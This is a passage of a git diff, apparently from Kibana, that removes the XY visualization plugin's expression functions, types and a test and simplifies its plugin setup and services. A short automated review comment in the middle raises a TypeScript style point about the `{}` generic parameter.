@@ -1,82 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { TimeMarker } from '../types'; - -export type ExpressionValueTimeMarker = ExpressionValueBoxed< - 'time_marker', - { - time: string; - class?: string; - color?: string; - opacity?: number; - width?: number; - } ->; - -export const timeMarker = (): ExpressionFunctionDefinition< - 'timemarker', - Datatable | null, - TimeMarker, - ExpressionValueTimeMarker -> => ({ - name: 'timemarker', - help: i18n.translate('visTypeXy.function.timemarker.help', { - defaultMessage: 'Generates time marker object', - }), - type: 'time_marker', - args: { - time: { - types: ['string'], - help: i18n.translate('visTypeXy.function.timeMarker.time.help', { - defaultMessage: 'Exact Time', - }), - required: true, - }, - class: { - types: ['string'], - help: i18n.translate('visTypeXy.function.timeMarker.class.help', { - defaultMessage: 'Css class name', - }), - }, - color: { - types: ['string'], - help: i18n.translate('visTypeXy.function.timeMarker.color.help', { - defaultMessage: 'Color of time marker', - }), - }, - opacity: { - types: ['number'], - help: i18n.translate('visTypeXy.function.timeMarker.opacity.help', { - defaultMessage: 'Opacity of time marker', - }), - }, - width: { - types: ['number'], - help: i18n.translate('visTypeXy.function.timeMarker.width.help', { - defaultMessage: 'Width of time marker', - }), - }, - }, - fn: (context, args) => { - return { - type: 'time_marker', - time: args.time, - class: args.class, - color: args.color, - 
opacity: args.opacity, - width: args.width, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/value_axis.ts b/src/plugins/vis_types/xy/public/expression_functions/value_axis.ts deleted file mode 100644 index 8b32084d8b588..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/value_axis.ts +++ /dev/null 
@@ -1,79 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { ExpressionValueCategoryAxis } from './category_axis'; -import type { CategoryAxis } from '../types'; - -interface Arguments { - name: string; - axisParams: ExpressionValueCategoryAxis; -} - -export type ExpressionValueValueAxis = ExpressionValueBoxed< - 'value_axis', - { - name: string; - id: string; - show: boolean; - position: CategoryAxis['position']; - axisType: CategoryAxis['type']; - title: { - text?: string; - }; - labels: CategoryAxis['labels']; - scale: CategoryAxis['scale']; - } ->; - -export const valueAxis = (): ExpressionFunctionDefinition< - 'valueaxis', - Datatable | null, - Arguments, - ExpressionValueValueAxis -> => ({ - name: 'valueaxis', - help: i18n.translate('visTypeXy.function.valueaxis.help', { - defaultMessage: 'Generates value axis object', - }), - type: 'value_axis', - args: { - name: { - types: ['string'], - help: i18n.translate('visTypeXy.function.valueAxis.name.help', { - defaultMessage: 'Name of value axis', - }), - required: true, - }, - axisParams: { - types: ['category_axis'], - help: i18n.translate('visTypeXy.function.valueAxis.axisParams.help', { - defaultMessage: 'Value axis params', - }), - required: true, - }, - }, - fn: (context, args) => { - return { - type: 'value_axis', - name: args.name, - id: args.axisParams.id, - show: args.axisParams.show, - position: args.axisParams.position, - axisType: args.axisParams.axisType, - title: args.axisParams.title, - scale: 
args.axisParams.scale, - labels: args.axisParams.labels, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/vis_scale.ts b/src/plugins/vis_types/xy/public/expression_functions/vis_scale.ts deleted file mode 100644 index 33952473e5916..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/vis_scale.ts +++ /dev/null 
@@ -1,98 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { Scale } from '../types'; - -export type ExpressionValueScale = ExpressionValueBoxed< - 'vis_scale', - { - boundsMargin?: Scale['boundsMargin']; - defaultYExtents?: Scale['defaultYExtents']; - max?: Scale['max']; - min?: Scale['min']; - mode?: Scale['mode']; - setYExtents?: Scale['setYExtents']; - scaleType: Scale['type']; - } ->; - -export const visScale = (): ExpressionFunctionDefinition< - 'visscale', - Datatable | null, - Scale, - ExpressionValueScale -> => ({ - name: 'visscale', - help: i18n.translate('visTypeXy.function.scale.help', { - defaultMessage: 'Generates scale object', - }), - type: 'vis_scale', - args: { - boundsMargin: { - types: ['number', 'string'], - help: i18n.translate('visTypeXy.function.scale.boundsMargin.help', { - defaultMessage: 'Margin of bounds', - }), - }, - defaultYExtents: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.scale.defaultYExtents.help', { - defaultMessage: 'Flag which allows to scale to data bounds', - }), - }, - setYExtents: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.scale.setYExtents.help', { - defaultMessage: 'Flag which allows to set your own extents', - }), - }, - max: { - types: ['number', 'null'], - help: i18n.translate('visTypeXy.function.scale.max.help', { - defaultMessage: 'Max value', - }), - }, - min: { - types: ['number', 'null'], - help: i18n.translate('visTypeXy.function.scale.min.help', { - defaultMessage: 'Min value', 
- }), - }, - mode: { - types: ['string'], - help: i18n.translate('visTypeXy.function.scale.mode.help', { - defaultMessage: 'Scale mode. Can be normal, percentage, wiggle or silhouette', - }), - }, - type: { - types: ['string'], - help: i18n.translate('visTypeXy.function.scale.type.help', { - defaultMessage: 'Scale type. Can be linear, log or square root', - }), - required: true, - }, - }, - fn: (context, args) => { - return { - type: 'vis_scale', - boundsMargin: args.boundsMargin, - defaultYExtents: args.defaultYExtents, - setYExtents: args.setYExtents, - max: args.max, - min: args.min, - mode: args.mode, - scaleType: args.type, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/xy_vis_fn.ts b/src/plugins/vis_types/xy/public/expression_functions/xy_vis_fn.ts deleted file mode 100644 index 8dc7481300bc0..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/xy_vis_fn.ts +++ /dev/null 
@@ -1,370 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; - -import type { - ExpressionFunctionDefinition, - Datatable, - Render, -} from '@kbn/expressions-plugin/common'; -import { - prepareLogTable, - Dimension, - DEFAULT_LEGEND_SIZE, - LegendSize, -} from '@kbn/visualizations-plugin/public'; -import type { VisParams, XYVisConfig } from '../types'; -import type { XyVisType } from '../../common'; - -export const visName = 'xy_vis'; -export interface RenderValue { - visData: Datatable; - visType: XyVisType; - visConfig: VisParams; - syncColors: boolean; - syncTooltips: boolean; -} - -export type VisTypeXyExpressionFunctionDefinition = ExpressionFunctionDefinition< - typeof visName, - Datatable, - XYVisConfig, - Render ->; - -export const visTypeXyVisFn = (): VisTypeXyExpressionFunctionDefinition => ({ - name: visName, - type: 'render', - context: { - types: ['datatable'], - }, - help: i18n.translate('visTypeXy.functions.help', { - defaultMessage: 'XY visualization', - }), - args: { - type: { - types: ['string'], - default: '""', - help: 'xy vis type', - }, - chartType: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.args.chartType.help', { - defaultMessage: 'Type of a chart. 
Can be line, area or histogram', - }), - }, - addTimeMarker: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.addTimeMarker.help', { - defaultMessage: 'Show time marker', - }), - }, - truncateLegend: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.truncateLegend.help', { - defaultMessage: 'Defines if the legend will be truncated or not', - }), - }, - maxLegendLines: { - types: ['number'], - help: i18n.translate('visTypeXy.function.args.args.maxLegendLines.help', { - defaultMessage: 'Defines the maximum lines per legend item', - }), - }, - legendSize: { - types: ['string'], - default: DEFAULT_LEGEND_SIZE, - help: i18n.translate('visTypeXy.function.args.args.legendSize.help', { - defaultMessage: 'Specifies the legend size.', - }), - options: [ - LegendSize.AUTO, - LegendSize.SMALL, - LegendSize.MEDIUM, - LegendSize.LARGE, - LegendSize.EXTRA_LARGE, - ], - strict: true, - }, - addLegend: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.addLegend.help', { - defaultMessage: 'Show chart legend', - }), - }, - addTooltip: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.addTooltip.help', { - defaultMessage: 'Show tooltip on hover', - }), - }, - legendPosition: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.legendPosition.help', { - defaultMessage: 'Position the legend on top, bottom, left, right of the chart', - }), - }, - categoryAxes: { - types: ['category_axis'], - help: i18n.translate('visTypeXy.function.args.categoryAxes.help', { - defaultMessage: 'Category axis config', - }), - multi: true, - }, - thresholdLine: { - types: ['threshold_line'], - help: i18n.translate('visTypeXy.function.args.thresholdLine.help', { - defaultMessage: 'Threshold line config', - }), - }, - labels: { - types: ['label'], - help: i18n.translate('visTypeXy.function.args.labels.help', { - defaultMessage: 'Chart labels config', - }), - }, - orderBucketsBySum: { - types: 
['boolean'], - help: i18n.translate('visTypeXy.function.args.orderBucketsBySum.help', { - defaultMessage: 'Order buckets by sum', - }), - }, - seriesParams: { - types: ['series_param'], - help: i18n.translate('visTypeXy.function.args.seriesParams.help', { - defaultMessage: 'Series param config', - }), - multi: true, - }, - valueAxes: { - types: ['value_axis'], - help: i18n.translate('visTypeXy.function.args.valueAxes.help', { - defaultMessage: 'Value axis config', - }), - multi: true, - }, - radiusRatio: { - types: ['number'], - help: i18n.translate('visTypeXy.function.args.radiusRatio.help', { - defaultMessage: 'Dot size ratio', - }), - }, - gridCategoryLines: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.gridCategoryLines.help', { - defaultMessage: 'Show grid category lines in chart', - }), - }, - gridValueAxis: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.gridValueAxis.help', { - defaultMessage: 'Name of value axis for which we show grid', - }), - }, - isVislibVis: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.isVislibVis.help', { - defaultMessage: - 'Flag to indicate old vislib visualizations. 
Used for backwards compatibility including colors', - }), - }, - detailedTooltip: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.detailedTooltip.help', { - defaultMessage: 'Show detailed tooltip', - }), - }, - fittingFunction: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.fittingFunction.help', { - defaultMessage: 'Name of fitting function', - }), - }, - times: { - types: ['time_marker'], - help: i18n.translate('visTypeXy.function.args.times.help', { - defaultMessage: 'Time marker config', - }), - multi: true, - }, - palette: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.palette.help', { - defaultMessage: 'Defines the chart palette name', - }), - }, - fillOpacity: { - types: ['number'], - help: i18n.translate('visTypeXy.function.args.fillOpacity.help', { - defaultMessage: 'Defines the area chart fill opacity', - }), - }, - xDimension: { - types: ['xy_dimension', 'null'], - help: i18n.translate('visTypeXy.function.args.xDimension.help', { - defaultMessage: 'X axis dimension config', - }), - }, - yDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.yDimension.help', { - defaultMessage: 'Y axis dimension config', - }), - multi: true, - }, - zDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.zDimension.help', { - defaultMessage: 'Z axis dimension config', - }), - multi: true, - }, - widthDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.widthDimension.help', { - defaultMessage: 'Width dimension config', - }), - multi: true, - }, - seriesDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.seriesDimension.help', { - defaultMessage: 'Series dimension config', - }), - multi: true, - }, - splitRowDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.splitRowDimension.help', { - defaultMessage: 'Split by row dimension 
config', - }), - multi: true, - }, - splitColumnDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.splitColumnDimension.help', { - defaultMessage: 'Split by column dimension config', - }), - multi: true, - }, - ariaLabel: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.ariaLabel.help', { - defaultMessage: 'Specifies the aria label of the xy chart', - }), - required: false, - }, - }, - fn(context, args, handlers) { - const visType = args.type; - const visConfig = { - ariaLabel: - args.ariaLabel ?? - (handlers.variables?.embeddableTitle as string) ?? - handlers.getExecutionContext?.()?.description, - type: args.chartType, - addLegend: args.addLegend, - addTooltip: args.addTooltip, - legendPosition: args.legendPosition, - addTimeMarker: args.addTimeMarker, - maxLegendLines: args.maxLegendLines, - truncateLegend: args.truncateLegend, - legendSize: args.legendSize, - categoryAxes: args.categoryAxes.map((categoryAxis) => ({ - ...categoryAxis, - type: categoryAxis.axisType, - })), - orderBucketsBySum: args.orderBucketsBySum, - labels: args.labels, - thresholdLine: args.thresholdLine, - valueAxes: args.valueAxes.map((valueAxis) => ({ ...valueAxis, type: valueAxis.axisType })), - grid: { - categoryLines: args.gridCategoryLines, - valueAxis: args.gridValueAxis, - }, - seriesParams: args.seriesParams.map((seriesParam) => ({ - ...seriesParam, - type: seriesParam.seriesParamType, - })), - radiusRatio: args.radiusRatio, - times: args.times, - isVislibVis: args.isVislibVis, - detailedTooltip: args.detailedTooltip, - palette: { - type: 'palette', - name: args.palette, - }, - fillOpacity: args.fillOpacity, - fittingFunction: args.fittingFunction, - dimensions: { - x: args.xDimension, - y: args.yDimension, - z: args.zDimension, - width: args.widthDimension, - series: args.seriesDimension, - splitRow: args.splitRowDimension, - splitColumn: args.splitColumnDimension, - }, - } as VisParams; - - if 
(handlers?.inspectorAdapters?.tables) { - const argsTable: Dimension[] = [ - [ - args.yDimension, - i18n.translate('visTypeXy.function.dimension.metric', { - defaultMessage: 'Metric', - }), - ], - [ - args.zDimension, - i18n.translate('visTypeXy.function.adimension.dotSize', { - defaultMessage: 'Dot size', - }), - ], - [ - args.splitColumnDimension, - i18n.translate('visTypeXy.function.dimension.splitcolumn', { - defaultMessage: 'Column split', - }), - ], - [ - args.splitRowDimension, - i18n.translate('visTypeXy.function.dimension.splitrow', { - defaultMessage: 'Row split', - }), - ], - ]; - - if (args.xDimension) { - argsTable.push([ - [args.xDimension], - i18n.translate('visTypeXy.function.adimension.bucket', { - defaultMessage: 'Bucket', - }), - ]); - } - - const logTable = prepareLogTable(context, argsTable); - handlers.inspectorAdapters.tables.logDatatable('default', logTable); - } - - return { - type: 'render', - as: visName, - value: { - context, - visType, - visConfig, - visData: context, - syncColors: handlers?.isSyncColorsEnabled?.() ?? false, - syncTooltips: handlers?.isSyncTooltipsEnabled?.() ?? false, - }, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/index.ts b/src/plugins/vis_types/xy/public/index.ts index 41a8e08fa1ad2..7ad2e3058e49f 100644 --- a/src/plugins/vis_types/xy/public/index.ts +++ b/src/plugins/vis_types/xy/public/index.ts @@ -29,7 +29,6 @@ export type { ValidationVisOptionsProps } from './editor/components/common/valid export { TruncateLabelsOption } from './editor/components/common/truncate_labels'; export { getPositions } from './editor/positions'; export { getScaleTypes } from './editor/scale_types'; -export { getAggId } from './config/get_agg_id'; // Export common types export * from '../common'; diff --git a/src/plugins/vis_types/xy/public/plugin.ts b/src/plugins/vis_types/xy/public/plugin.ts index 29a5e434a5f01..4561006e43e92 100644 --- a/src/plugins/vis_types/xy/public/plugin.ts 
+++ b/src/plugins/vis_types/xy/public/plugin.ts @@ -6,31 +6,12 @@ * Side Public License, v 1. */ -import type { CoreSetup, CoreStart, Plugin } from '@kbn/core/public'; -import type { Plugin as ExpressionsPublicPlugin } from '@kbn/expressions-plugin/public'; -import type { VisualizationsSetup, VisualizationsStart } from '@kbn/visualizations-plugin/public'; -import type { FieldFormatsStart } from '@kbn/field-formats-plugin/public'; -import type { ChartsPluginSetup, ChartsPluginStart } from '@kbn/charts-plugin/public'; -import type { DataPublicPluginStart } from '@kbn/data-plugin/public'; -import type { - UsageCollectionSetup, - UsageCollectionStart, -} from '@kbn/usage-collection-plugin/public'; -import { createStartServicesGetter } from '@kbn/kibana-utils-plugin/public'; -import { - setDataActions, - setFormatService, - setThemeService, - setUISettings, - setDocLinks, - setPalettesService, - setActiveCursor, -} from './services'; +import type { CoreSetup, Plugin } from '@kbn/core/public'; +import type { VisualizationsSetup } from '@kbn/visualizations-plugin/public'; +import type { ChartsPluginSetup } from '@kbn/charts-plugin/public'; +import { setUISettings, setPalettesService } from './services'; import { visTypesDefinitions } from './vis_types'; -import { getXYVisRenderer } from './vis_renderer'; - -import * as expressionFunctions from './expression_functions'; // eslint-disable-next-line @typescript-eslint/no-empty-interface export interface VisTypeXyPluginSetup {} 
@@ -39,70 +20,29 @@ export interface VisTypeXyPluginStart {} /** @internal */ export interface VisTypeXyPluginSetupDependencies { - expressions: ReturnType; visualizations: VisualizationsSetup; charts: ChartsPluginSetup; - usageCollection: UsageCollectionSetup; -} - -/** @internal */ -export interface VisTypeXyPluginStartDependencies { - expressions: ReturnType; - visualizations: VisualizationsStart; - data: DataPublicPluginStart; - fieldFormats: FieldFormatsStart; - charts: ChartsPluginStart; - usageCollection?: UsageCollectionStart; } -type VisTypeXyCoreSetup = CoreSetup; +type VisTypeXyCoreSetup = CoreSetup<{}, VisTypeXyPluginStart>; /** @internal */ export class VisTypeXyPlugin implements - Plugin< - VisTypeXyPluginSetup, - VisTypeXyPluginStart, - VisTypeXyPluginSetupDependencies, - VisTypeXyPluginStartDependencies - > + Plugin { public setup( core: VisTypeXyCoreSetup, - { expressions, visualizations, charts, usageCollection }: VisTypeXyPluginSetupDependencies + { visualizations, charts }: VisTypeXyPluginSetupDependencies ) { setUISettings(core.uiSettings); - setThemeService(charts.theme); setPalettesService(charts.palettes); - const getStartDeps = createStartServicesGetter< - VisTypeXyPluginStartDependencies, - VisTypeXyPluginStart - >(core.getStartServices); - - expressions.registerRenderer( - getXYVisRenderer({ - getStartDeps, - }) - ); - expressions.registerFunction(expressionFunctions.visTypeXyVisFn); - expressions.registerFunction(expressionFunctions.categoryAxis); - expressions.registerFunction(expressionFunctions.timeMarker); - expressions.registerFunction(expressionFunctions.valueAxis); - expressions.registerFunction(expressionFunctions.seriesParam); - expressions.registerFunction(expressionFunctions.thresholdLine); - expressions.registerFunction(expressionFunctions.label); - expressions.registerFunction(expressionFunctions.visScale); - visTypesDefinitions.forEach(visualizations.createBaseVisualization); return {}; } - public start(core: CoreStart, { 
data, charts, fieldFormats }: VisTypeXyPluginStartDependencies) { - setFormatService(fieldFormats); - setDataActions(data.actions); - setDocLinks(core.docLinks); - setActiveCursor(charts.activeCursor); + public start() { return {}; } } diff --git a/src/plugins/vis_types/xy/public/services.ts b/src/plugins/vis_types/xy/public/services.ts index d680a5d7f4498..2358bcb5ede2e 100644 --- a/src/plugins/vis_types/xy/public/services.ts +++ b/src/plugins/vis_types/xy/public/services.ts @@ -6,29 +6,13 @@ * Side Public License, v 1. */ -import type { CoreSetup, DocLinksStart } from '@kbn/core/public'; -import type { FieldFormatsStart } from '@kbn/field-formats-plugin/public'; -import type { DataPublicPluginStart } from '@kbn/data-plugin/public'; -import type { ChartsPluginSetup, ChartsPluginStart } from '@kbn/charts-plugin/public'; +import type { CoreSetup } from '@kbn/core/public'; +import type { ChartsPluginSetup } from '@kbn/charts-plugin/public'; import { createGetterSetter } from '@kbn/kibana-utils-plugin/public'; export const [getUISettings, setUISettings] = createGetterSetter('xy core.uiSettings'); -export const [getDataActions, setDataActions] = - createGetterSetter('xy data.actions'); - -export const [getFormatService, setFormatService] = - createGetterSetter('xy fieldFormats'); - -export const [getThemeService, setThemeService] = - createGetterSetter('xy charts.theme'); - -export const [getActiveCursor, setActiveCursor] = - createGetterSetter('xy charts.activeCursor'); - export const [getPalettesService, setPalettesService] = createGetterSetter('xy charts.palette'); - -export const [getDocLinks, setDocLinks] = createGetterSetter('DocLinks'); diff --git a/src/plugins/vis_types/xy/public/types/config.ts b/src/plugins/vis_types/xy/public/types/config.ts deleted file mode 100644 index 287787193bd20..0000000000000 --- a/src/plugins/vis_types/xy/public/types/config.ts +++ /dev/null 
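Review bot: The new `type VisTypeXyCoreSetup = CoreSetup<{}, VisTypeXyPluginStart>;` uses `{}` as the start-dependencies type parameter, which in TypeScript means "any non-nullish value" rather than "no dependencies"; since `start()` now takes no arguments and the start-dependencies interface is removed in this hunk, `object` or `Record<string, never>` states that intent precisely, e.g. `type VisTypeXyCoreSetup = CoreSetup<object, VisTypeXyPluginStart>;`. This is a style point only, and whether the repo's lint config flags `{}` should decide it. The generic arguments on the `Plugin` implements clause appear to have been lost in rendering, so I could not confirm they were narrowed consistently with the alias.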
@@ -1,123 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { - AxisSpec, - CustomTooltip, - Fit, - GridLineStyle, - Position, - Rotation, - SeriesScales, - TickFormatter, - TooltipProps, - TooltipValueFormatter, - YDomainRange, -} from '@elastic/charts'; - -import type { Dimension, Scale, ThresholdLine } from './param'; - -export interface Column { - id: string | null; - name: string; -} - -export interface Aspect { - accessor: Column['id']; - aggType: string | null; - aggId: string | null; - column?: Dimension['accessor']; - title: Column['name']; - format?: Dimension['format']; - formatter?: TickFormatter; - params: Dimension['params']; -} - -export interface Aspects { - x: Aspect; - y: Aspect[]; - z?: Aspect; - series?: Aspect[]; - splitColumn?: Aspect; - splitRow?: Aspect; -} - -export interface AxisGrid { - show?: boolean; - styles?: GridLineStyle; -} - -export interface TickOptions { - show?: boolean; - size?: number; - count?: number; - padding?: number; - formatter?: TickFormatter; - labelFormatter?: TickFormatter; - rotation?: number; - showDuplicates?: boolean; - integersOnly?: boolean; - showOverlappingTicks?: boolean; - showOverlappingLabels?: boolean; -} - -export type YScaleType = SeriesScales['yScaleType']; -export type XScaleType = SeriesScales['xScaleType']; - -export type ScaleConfig = Omit & { - type?: S; -}; - -export interface AxisConfig { - id: string; - groupId?: string; - position: Position; - ticks?: TickOptions; - show: boolean; - style: AxisSpec['style']; - scale: ScaleConfig; - domain?: YDomainRange; - title?: string; - grid?: AxisGrid; - integersOnly: boolean; - timeAxisLayerCount?: number; -} - -export interface 
LegendOptions { - show: boolean; - position?: Position; -} - -export type ThresholdLineConfig = Omit & { - dash?: number[]; - groupId?: string; -}; - -export type TooltipConfig = Omit & { - detailedTooltip?: (headerFormatter?: TooltipValueFormatter) => CustomTooltip; -}; - -export interface VisConfig { - legend: LegendOptions; - tooltip: TooltipConfig; - xAxis: AxisConfig; - yAxes: Array>; - aspects: Aspects; - rotation: Rotation; - thresholdLine: ThresholdLineConfig; - orderBucketsBySum?: boolean; - showCurrentTime: boolean; - isTimeChart: boolean; - markSizeRatio: number; - showValueLabel: boolean; - enableHistogramMode: boolean; - fittingFunction?: Exclude; - fillOpacity?: number; - detailedTooltip?: boolean; - isVislibVis?: boolean; -} diff --git a/src/plugins/vis_types/xy/public/types/constants.ts b/src/plugins/vis_types/xy/public/types/constants.ts index 05ed0783d4c68..e4c7c30dc2e89 100644 --- a/src/plugins/vis_types/xy/public/types/constants.ts +++ b/src/plugins/vis_types/xy/public/types/constants.ts @@ -40,9 +40,3 @@ export enum ThresholdLineStyle { Dashed = 'dashed', DotDashed = 'dot-dashed', } - -export enum ColorMode { - Background = 'Background', - Labels = 'Labels', - None = 'None', -} diff --git a/src/plugins/vis_types/xy/public/types/index.ts b/src/plugins/vis_types/xy/public/types/index.ts index 6abbdfabaa956..04426b03c5b87 100644 --- a/src/plugins/vis_types/xy/public/types/index.ts +++ b/src/plugins/vis_types/xy/public/types/index.ts @@ -7,6 +7,4 @@ */ export * from './constants'; -export * from './config'; export * from './param'; -export type { VisTypeNames, XyVisTypeDefinition } from './vis_type'; diff --git a/src/plugins/vis_types/xy/public/types/param.ts b/src/plugins/vis_types/xy/public/types/param.ts index a491efad97fcb..5e65c85e9f2e9 100644 --- a/src/plugins/vis_types/xy/public/types/param.ts +++ b/src/plugins/vis_types/xy/public/types/param.ts 
@@ -11,21 +11,12 @@ import type { PaletteOutput } from '@kbn/coloring'; import type { Style, Labels } from '@kbn/charts-plugin/public'; import type { SchemaConfig, - ExpressionValueXYDimension, FakeParams, HistogramParams, DateHistogramParams, LegendSize, } from '@kbn/visualizations-plugin/public'; -import type { ChartType, XyVisType } from '../../common'; -import type { - ExpressionValueCategoryAxis, - ExpressionValueSeriesParam, - ExpressionValueValueAxis, - ExpressionValueLabel, - ExpressionValueThresholdLine, - ExpressionValueTimeMarker, -} from '../expression_functions'; +import type { ChartType } from '../../common'; import type { ChartMode, 
@@ -150,45 +141,3 @@ export interface VisParams { fittingFunction?: Exclude; ariaLabel?: string; } - -export interface XYVisConfig { - type: XyVisType; - chartType: ChartType; - gridCategoryLines: boolean; - gridValueAxis?: string; - categoryAxes: ExpressionValueCategoryAxis[]; - valueAxes: ExpressionValueValueAxis[]; - seriesParams: ExpressionValueSeriesParam[]; - palette: string; - addLegend: boolean; - addTooltip: boolean; - legendPosition: Position; - addTimeMarker: boolean; - truncateLegend: boolean; - maxLegendLines: number; - legendSize?: LegendSize; - orderBucketsBySum?: boolean; - labels: ExpressionValueLabel; - thresholdLine: ExpressionValueThresholdLine; - radiusRatio: number; - times: ExpressionValueTimeMarker[]; // For compatibility with vislib - /** - * flag to indicate old vislib visualizations - * used for backwards compatibility including colors - */ - isVislibVis?: boolean; - /** - * Add for detailed tooltip option - */ - detailedTooltip?: boolean; - fittingFunction?: Exclude; - fillOpacity?: number; - xDimension: ExpressionValueXYDimension | null; - yDimension: ExpressionValueXYDimension[]; - zDimension?: ExpressionValueXYDimension[]; - widthDimension?: ExpressionValueXYDimension[]; - seriesDimension?: ExpressionValueXYDimension[]; - splitRowDimension?: ExpressionValueXYDimension[]; - splitColumnDimension?: ExpressionValueXYDimension[]; - ariaLabel?: string; -} diff --git a/src/plugins/vis_types/xy/public/types/vis_type.ts b/src/plugins/vis_types/xy/public/types/vis_type.ts deleted file mode 100644 index 39d762465c34f..0000000000000 --- a/src/plugins/vis_types/xy/public/types/vis_type.ts +++ /dev/null 
@@ -1,16 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { VisTypeDefinition } from '@kbn/visualizations-plugin/public'; -import { ChartType } from '../../common'; - -import { VisParams } from './param'; - -export type VisTypeNames = ChartType | 'horizontal_bar'; - -export type XyVisTypeDefinition = VisTypeDefinition; diff --git a/src/plugins/vis_types/xy/public/utils/accessors.test.ts b/src/plugins/vis_types/xy/public/utils/accessors.test.ts deleted file mode 100644 index 882c3d382a237..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/accessors.test.ts +++ /dev/null 
@@ -1,155 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { - COMPLEX_SPLIT_ACCESSOR, - getComplexAccessor, - isPercentileIdEqualToSeriesId, -} from './accessors'; -import { BUCKET_TYPES } from '@kbn/data-plugin/common'; -import { AccessorFn, Datum } from '@elastic/charts'; - -describe('XY chart datum accessors', () => { - const aspectBase = { - accessor: 'col-0-2', - formatter: (value: Datum) => value, - aggId: '', - title: '', - params: {}, - }; - - it('should return complex accessor for IP range aggregation', () => { - const aspect = { - aggType: BUCKET_TYPES.IP_RANGE, - ...aspectBase, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR)(aspect); - const datum = { - 'col-0-2': { type: 'range', from: '0.0.0.0', to: '127.255.255.255' }, - }; - - expect(typeof accessor).toBe('function'); - expect((accessor as AccessorFn)(datum)).toStrictEqual({ - type: 'range', - from: '0.0.0.0', - to: '127.255.255.255', - }); - }); - - it('should return complex accessor for date range aggregation', () => { - const aspect = { - aggType: BUCKET_TYPES.DATE_RANGE, - ...aspectBase, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR)(aspect); - const datum = { - 'col-0-2': { from: '1613941200000', to: '1614685113537' }, - }; - - expect(typeof accessor).toBe('function'); - expect((accessor as AccessorFn)(datum)).toStrictEqual({ - from: '1613941200000', - to: '1614685113537', - }); - }); - - it('should return complex accessor when isComplex option set to true', () => { - const aspect = { - aggType: BUCKET_TYPES.TERMS, - ...aspectBase, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR, true)(aspect); - - expect(typeof 
